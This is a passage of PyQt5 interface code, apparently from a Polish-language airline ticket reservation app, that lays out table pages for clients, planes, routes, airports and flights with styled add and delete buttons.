self.horizontalLayout_2.addWidget(self.przycisk_zapis)\n\n self.przycisk_zapis.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n self.przysick_odczyt = QtWidgets.QPushButton(self.lewo_dol_ramka)\n self.przysick_odczyt.setMinimumSize(QtCore.QSize(0, 60))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przysick_odczyt.setFont(font)\n self.przysick_odczyt.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przysick_odczyt.setObjectName(\"przysick_odczyt\")\n self.przysick_odczyt.clicked.connect(self.przycisk_odczyt_click)\n self.horizontalLayout_2.addWidget(self.przysick_odczyt)\n self.verticalLayout.addWidget(self.lewo_dol_ramka)\n self.horizontalLayout.addWidget(self.lewa_ramka)\n\n self.przysick_odczyt.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n self.prawa_ramka = QtWidgets.QFrame(self.glowny)\n self.prawa_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.prawa_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.prawa_ramka.setObjectName(\"prawa_ramka\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.prawa_ramka)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setSpacing(0)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n\n\n\n self.miejsce_na_stos = QtWidgets.QFrame(self.prawa_ramka)\n self.miejsce_na_stos.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.miejsce_na_stos.setFrameShadow(QtWidgets.QFrame.Raised)\n self.miejsce_na_stos.setObjectName(\"miejsce_na_stos\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.miejsce_na_stos)\n self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_3.setSpacing(0)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.stos_tabel = QtWidgets.QStackedWidget(self.miejsce_na_stos)\n self.stos_tabel.setObjectName(\"stos_tabel\")\n\n # strona klienci\n\n self.strona_klienci = QtWidgets.QWidget()\n self.strona_klienci.setObjectName(\"strona_klienci\")\n self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.strona_klienci)\n self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_4.setSpacing(0)\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\n self.klienci_gora = QtWidgets.QFrame(self.strona_klienci)\n self.klienci_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.klienci_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.klienci_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.klienci_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.klienci_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.klienci_gora.setObjectName(\"klienci_gora\")\n self.verticalLayout_14 = QtWidgets.QVBoxLayout(self.klienci_gora)\n self.verticalLayout_14.setObjectName(\"verticalLayout_14\")\n self.napis_klienci = QtWidgets.QLabel(self.klienci_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(40)\n self.napis_klienci.setFont(font)\n self.napis_klienci.setObjectName(\"napis_klienci\")\n self.verticalLayout_14.addWidget(self.napis_klienci)\n self.verticalLayout_4.addWidget(self.klienci_gora)\n self.klienci_tabela = QtWidgets.QFrame(self.strona_klienci)\n self.klienci_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.klienci_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.klienci_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.klienci_tabela.setObjectName(\"klienci_tabela\")\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.klienci_tabela)\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\n self.tabela_klienci = QtWidgets.QTableWidget(self.klienci_tabela)\n self.tabela_klienci.setObjectName(\"tableWidget_5\")\n\n font.setPointSize(12)\n self.tabela_klienci.setFont(font)\n\n self.tabela_klienci.setColumnCount(3)\n self.tabela_klienci.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n self.tabela_klienci.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_klienci.setHorizontalHeaderItem(0, item)\n self.tabela_klienci.setColumnWidth(0,200)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_klienci.setHorizontalHeaderItem(1, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_klienci.setColumnWidth(1,200)\n self.tabela_klienci.setHorizontalHeaderItem(2, item)\n self.tabela_klienci.setColumnWidth(2,200)\n self.horizontalLayout_6.addWidget(self.tabela_klienci)\n self.verticalLayout_4.addWidget(self.klienci_tabela)\n\n\n\n self.klienci_dol = QtWidgets.QFrame(self.strona_klienci)\n self.klienci_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.klienci_dol.setMaximumSize(QtCore.QSize(16777215,16777215))\n self.klienci_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.klienci_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.klienci_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.klienci_dol.setObjectName(\"klienci_dol\")\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.klienci_dol)\n self.horizontalLayout_5.setContentsMargins(0, 0, 10,0)\n self.horizontalLayout_5.setSpacing(10)\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\n spacerItem = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_5.addItem(spacerItem)\n\n\n\n self.przycisk_usun_klienci = QtWidgets.QPushButton(self.klienci_dol)\n self.przycisk_usun_klienci.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_usun_klienci.setMinimumSize(QtCore.QSize(120,40))\n self.przycisk_usun_klienci.setObjectName(\"przycisk_usun_klienci\")\n self.horizontalLayout_5.addWidget(self.przycisk_usun_klienci)\n self.przycisk_usun_klienci.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_klienci.clicked.connect(self.usun_klienci)\n\n\n\n self.przycisk_dodaj_klienci = QtWidgets.QPushButton(self.klienci_dol)\n self.przycisk_dodaj_klienci.setMinimumSize(QtCore.QSize(120,40))\n self.przycisk_dodaj_klienci.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_dodaj_klienci.setObjectName(\"przycisk_dodaj_klienci\")\n self.przycisk_dodaj_klienci.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.horizontalLayout_5.addWidget(self.przycisk_dodaj_klienci)\n self.przycisk_dodaj_klienci.clicked.connect(self.dodaj_klienci)\n self.verticalLayout_4.addWidget(self.klienci_dol)\n self.stos_tabel.addWidget(self.strona_klienci)\n\n #Strona samoloty\n\n self.strona_samoloty = QtWidgets.QWidget()\n self.strona_samoloty.setObjectName(\"strona_samoloty\")\n self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.strona_samoloty)\n self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_5.setSpacing(0)\n self.verticalLayout_5.setObjectName(\"verticalLayout_5\")\n self.samoloty_gora = QtWidgets.QFrame(self.strona_samoloty)\n self.samoloty_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.samoloty_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.samoloty_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.samoloty_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.samoloty_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.samoloty_gora.setObjectName(\"samoloty_gora\")\n self.verticalLayout_15 = QtWidgets.QVBoxLayout(self.samoloty_gora)\n self.verticalLayout_15.setObjectName(\"verticalLayout_15\")\n self.napis_samoloty = QtWidgets.QLabel(self.samoloty_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_samoloty.setFont(font)\n self.napis_samoloty.setObjectName(\"napis_samoloty\")\n self.verticalLayout_15.addWidget(self.napis_samoloty)\n self.verticalLayout_5.addWidget(self.samoloty_gora)\n self.samoloty_tabela = QtWidgets.QFrame(self.strona_samoloty)\n self.samoloty_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.samoloty_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.samoloty_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.samoloty_tabela.setObjectName(\"samoloty_tabela\")\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.samoloty_tabela)\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\n self.tabela_samoloty = QtWidgets.QTableWidget(self.samoloty_tabela)\n self.tabela_samoloty.setObjectName(\"tabela_samoloty\")\n font.setPointSize(12)\n self.tabela_samoloty.setFont(font)\n\n\n self.tabela_samoloty.setColumnCount(1)\n self.tabela_samoloty.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n\n\n self.tabela_samoloty.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_samoloty.setHorizontalHeaderItem(0, item)\n self.horizontalLayout_8.addWidget(self.tabela_samoloty)\n self.verticalLayout_5.addWidget(self.samoloty_tabela)\n self.tabela_samoloty.setColumnWidth(0,200)\n self.samoloty_dol = QtWidgets.QFrame(self.strona_samoloty)\n self.samoloty_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.samoloty_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.samoloty_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.samoloty_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.samoloty_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.samoloty_dol.setObjectName(\"samoloty_dol\")\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.samoloty_dol)\n self.horizontalLayout_7.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_7.setSpacing(10)\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\n spacerItem1 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_7.addItem(spacerItem1)\n\n\n\n self.przycisk_usun_samoloty = QtWidgets.QPushButton(self.samoloty_dol)\n self.przycisk_usun_samoloty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_samoloty.setObjectName(\"przycisk_usun_samoloty\")\n self.przycisk_usun_samoloty.clicked.connect(self.usun_samoloty)\n self.przycisk_usun_samoloty.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_7.addWidget(self.przycisk_usun_samoloty)\n\n\n self.przycisk_dodaj_samoloty = QtWidgets.QPushButton(self.samoloty_dol)\n self.przycisk_dodaj_samoloty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj_samoloty.setObjectName(\"przycisk_dodaj_samoloty\")\n self.przycisk_dodaj_samoloty.clicked.connect(self.dodaj_samoloty)\n self.przycisk_dodaj_samoloty.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_7.addWidget(self.przycisk_dodaj_samoloty)\n self.verticalLayout_5.addWidget(self.samoloty_dol)\n self.stos_tabel.addWidget(self.strona_samoloty)\n\n\n\n self.strona_trasy = QtWidgets.QWidget()\n self.strona_trasy.setObjectName(\"strona_trasy\")\n self.verticalLayout_13 = QtWidgets.QVBoxLayout(self.strona_trasy)\n self.verticalLayout_13.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_13.setSpacing(0)\n self.verticalLayout_13.setObjectName(\"verticalLayout_13\")\n self.trasy_gora = QtWidgets.QFrame(self.strona_trasy)\n self.trasy_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.trasy_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.trasy_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.trasy_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.trasy_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.trasy_gora.setObjectName(\"trasy_gora\")\n self.verticalLayout_12 = QtWidgets.QVBoxLayout(self.trasy_gora)\n self.verticalLayout_12.setObjectName(\"verticalLayout_12\")\n self.napis_trasy = QtWidgets.QLabel(self.trasy_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_trasy.setFont(font)\n self.napis_trasy.setObjectName(\"napis_trasy\")\n self.verticalLayout_12.addWidget(self.napis_trasy)\n self.verticalLayout_13.addWidget(self.trasy_gora)\n self.trasy_tabela = QtWidgets.QFrame(self.strona_trasy)\n self.trasy_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.trasy_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.trasy_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.trasy_tabela.setObjectName(\"trasy_tabela\")\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.trasy_tabela)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.tabela_trasy = QtWidgets.QTableWidget(self.trasy_tabela)\n self.tabela_trasy.setObjectName(\"tabela_trasy\")\n\n font.setPointSize(12)\n self.tabela_trasy.setFont(font)\n\n\n self.tabela_trasy.setColumnCount(4)\n self.tabela_trasy.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n\n self.tabela_trasy.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setColumnWidth(0,200)\n self.tabela_trasy.setHorizontalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setColumnWidth(1,200)\n self.tabela_trasy.setHorizontalHeaderItem(1, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setColumnWidth(2,200)\n self.tabela_trasy.setHorizontalHeaderItem(2, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setHorizontalHeaderItem(3, item)\n self.horizontalLayout_4.addWidget(self.tabela_trasy)\n self.verticalLayout_13.addWidget(self.trasy_tabela)\n self.trasy_dol = QtWidgets.QFrame(self.strona_trasy)\n self.trasy_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.trasy_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.trasy_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.trasy_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.trasy_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.trasy_dol.setObjectName(\"trasy_dol\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.trasy_dol)\n self.horizontalLayout_3.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_3.setSpacing(10)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n spacerItem2 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_3.addItem(spacerItem2)\n self.przycisk_usun = QtWidgets.QPushButton(self.trasy_dol)\n self.przycisk_usun.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun.setObjectName(\"przycisk_usun\")\n self.przycisk_usun.clicked.connect(self.usun_trasy)\n self.przycisk_usun.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_3.addWidget(self.przycisk_usun)\n self.przycisk_dodaj = QtWidgets.QPushButton(self.trasy_dol)\n self.przycisk_dodaj.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj.setObjectName(\"przycisk_dodaj\")\n self.przycisk_dodaj.clicked.connect(self.dodaj_trasy)\n self.przycisk_dodaj.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_3.addWidget(self.przycisk_dodaj)\n self.verticalLayout_13.addWidget(self.trasy_dol)\n self.stos_tabel.addWidget(self.strona_trasy)\n\n\n\n self.strona_lotniska = QtWidgets.QWidget()\n self.strona_lotniska.setObjectName(\"strona_lotniska\")\n self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.strona_lotniska)\n self.verticalLayout_6.setContentsMargins(0, 0,0, 0)\n self.verticalLayout_6.setSpacing(0)\n self.verticalLayout_6.setObjectName(\"verticalLayout_6\")\n self.lotniska_gora = QtWidgets.QFrame(self.strona_lotniska)\n self.lotniska_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.lotniska_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.lotniska_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.lotniska_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lotniska_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.lotniska_gora.setObjectName(\"lotniska_gora\")\n self.verticalLayout_16 = QtWidgets.QVBoxLayout(self.lotniska_gora)\n self.verticalLayout_16.setObjectName(\"verticalLayout_16\")\n self.napis_lotniska = QtWidgets.QLabel(self.lotniska_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_lotniska.setFont(font)\n self.napis_lotniska.setObjectName(\"napis_lotniska\")\n self.verticalLayout_16.addWidget(self.napis_lotniska)\n self.verticalLayout_6.addWidget(self.lotniska_gora)\n self.lotniska_tabela = QtWidgets.QFrame(self.strona_lotniska)\n self.lotniska_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.lotniska_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lotniska_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lotniska_tabela.setObjectName(\"lotniska_tabela\")\n self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.lotniska_tabela)\n self.horizontalLayout_9.setObjectName(\"horizontalLayout_9\")\n self.tabela_lotniska = QtWidgets.QTableWidget(self.lotniska_tabela)\n self.tabela_lotniska.setObjectName(\"tabela_lotniska\")\n\n font.setPointSize(12)\n self.tabela_lotniska.setFont(font)\n\n\n self.tabela_lotniska.setColumnCount(2)\n self.tabela_lotniska.setRowCount(11)\n item = QtWidgets.QTableWidgetItem()\n self.tabela_lotniska.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_lotniska.setColumnWidth(0,200)\n self.tabela_lotniska.setHorizontalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_lotniska.setColumnWidth(1,200)\n self.tabela_lotniska.setHorizontalHeaderItem(1, item)\n self.horizontalLayout_9.addWidget(self.tabela_lotniska)\n self.verticalLayout_6.addWidget(self.lotniska_tabela)\n self.lotniska_dol = QtWidgets.QFrame(self.strona_lotniska)\n self.lotniska_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.lotniska_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.lotniska_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.lotniska_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.lotniska_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lotniska_dol.setObjectName(\"lotniska_dol\")\n self.horizontalLayout_10 = QtWidgets.QHBoxLayout(self.lotniska_dol)\n self.horizontalLayout_10.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_10.setSpacing(10)\n self.horizontalLayout_10.setObjectName(\"horizontalLayout_10\")\n spacerItem3 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_10.addItem(spacerItem3)\n self.przycisk_usun_lotniska = QtWidgets.QPushButton(self.lotniska_dol)\n self.przycisk_usun_lotniska.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_lotniska.setObjectName(\"przycisk_usun_lotniska\")\n self.przycisk_usun_lotniska.clicked.connect(self.usun_lotniska)\n self.przycisk_usun_lotniska.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_10.addWidget(self.przycisk_usun_lotniska)\n\n self.przycisk_dodaj_lotniska = QtWidgets.QPushButton(self.lotniska_dol)\n self.przycisk_dodaj_lotniska.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj_lotniska.setObjectName(\"przycisk_dodaj_lotniska\")\n self.przycisk_dodaj_lotniska.clicked.connect(self.dodaj_lotniska)\n self.przycisk_dodaj_lotniska.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_10.addWidget(self.przycisk_dodaj_lotniska)\n self.verticalLayout_6.addWidget(self.lotniska_dol)\n self.stos_tabel.addWidget(self.strona_lotniska)\n\n\n\n self.strona_loty = QtWidgets.QWidget()\n self.strona_loty.setObjectName(\"stron_loty\")\n self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.strona_loty)\n self.verticalLayout_7.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_7.setSpacing(0)\n self.verticalLayout_7.setObjectName(\"verticalLayout_7\")\n self.loty_gora = QtWidgets.QFrame(self.strona_loty)\n self.loty_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.loty_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.loty_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.loty_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.loty_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.loty_gora.setObjectName(\"loty_gora\")\n self.verticalLayout_17 = QtWidgets.QVBoxLayout(self.loty_gora)\n self.verticalLayout_17.setObjectName(\"verticalLayout_17\")\n self.napis_loty = QtWidgets.QLabel(self.loty_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_loty.setFont(font)\n self.napis_loty.setObjectName(\"napis_loty\")\n self.verticalLayout_17.addWidget(self.napis_loty)\n self.verticalLayout_7.addWidget(self.loty_gora)\n self.loty_tabela = QtWidgets.QFrame(self.strona_loty)\n self.loty_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.loty_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.loty_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.loty_tabela.setObjectName(\"loty_tabela\")\n self.horizontalLayout_12 = QtWidgets.QHBoxLayout(self.loty_tabela)\n self.horizontalLayout_12.setObjectName(\"horizontalLayout_12\")\n self.tabela_loty = QtWidgets.QTableWidget(self.loty_tabela)\n self.tabela_loty.setObjectName(\"tabela_loty\")\n\n font.setPointSize(12)\n self.tabela_loty.setFont(font)\n\n\n self.tabela_loty.setColumnCount(7)\n self.tabela_loty.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n self.tabela_loty.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(0,135)\n self.tabela_loty.setHorizontalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(1,135)\n self.tabela_loty.setHorizontalHeaderItem(1, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(2,80)\n self.tabela_loty.setHorizontalHeaderItem(2, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(3,60)\n self.tabela_loty.setHorizontalHeaderItem(3, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(4,130)\n self.tabela_loty.setHorizontalHeaderItem(4, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(5,100)\n self.tabela_loty.setHorizontalHeaderItem(5, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(6,121)\n self.tabela_loty.setHorizontalHeaderItem(6, item)\n\n item = QtWidgets.QTableWidgetItem()\n self.tabela_loty.setItem(0, 0, item)\n\n self.horizontalLayout_12.addWidget(self.tabela_loty)\n self.verticalLayout_7.addWidget(self.loty_tabela)\n self.loty_dol = QtWidgets.QFrame(self.strona_loty)\n self.loty_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.loty_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.loty_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.loty_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.loty_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.loty_dol.setObjectName(\"loty_dol\")\n self.horizontalLayout_11 = QtWidgets.QHBoxLayout(self.loty_dol)\n self.horizontalLayout_11.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_11.setSpacing(10)\n self.horizontalLayout_11.setObjectName(\"horizontalLayout_11\")\n spacerItem4 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_11.addItem(spacerItem4)\n self.przycisk_usun_loty = QtWidgets.QPushButton(self.loty_dol)\n self.przycisk_usun_loty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_loty.setObjectName(\"przycisk_usun_loty\")\n self.przycisk_usun_loty.clicked.connect(self.usun_loty)\n self.przycisk_usun_loty.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_11.addWidget(self.przycisk_usun_loty)\n\n self.przycisk_dodaj_loty = QtWidgets.QPushButton(self.loty_dol)\n self.przycisk_dodaj_loty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj_loty.setObjectName(\"przycisk_dodaj_loty\")\n self.przycisk_dodaj_loty.clicked.connect(self.dodaj_loty)\n self.przycisk_dodaj_loty.setMinimumSize(QtCore.QSize(120,40))\n\n self.przycisk_rezerwacje = QtWidgets.QPushButton(self.loty_dol)\n self.przycisk_rezerwacje.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(98, 174, 163);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_rezerwacje.setObjectName(\"przycisk_rezerwacje\")\n self.przycisk_rezerwacje.clicked.connect(self.rezerwacja_click)\n self.przycisk_rezerwacje.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_11.addWidget(self.przycisk_rezerwacje)\n\n\n self.horizontalLayout_11.addWidget(self.przycisk_dodaj_loty)\n self.verticalLayout_7.addWidget(self.loty_dol)\n self.stos_tabel.addWidget(self.strona_loty)\n self.verticalLayout_3.addWidget(self.stos_tabel)\n self.verticalLayout_2.addWidget(self.miejsce_na_stos)\n self.horizontalLayout.addWidget(self.prawa_ramka)\n System_rezerwacji_biletow.setCentralWidget(self.glowny)\n\n 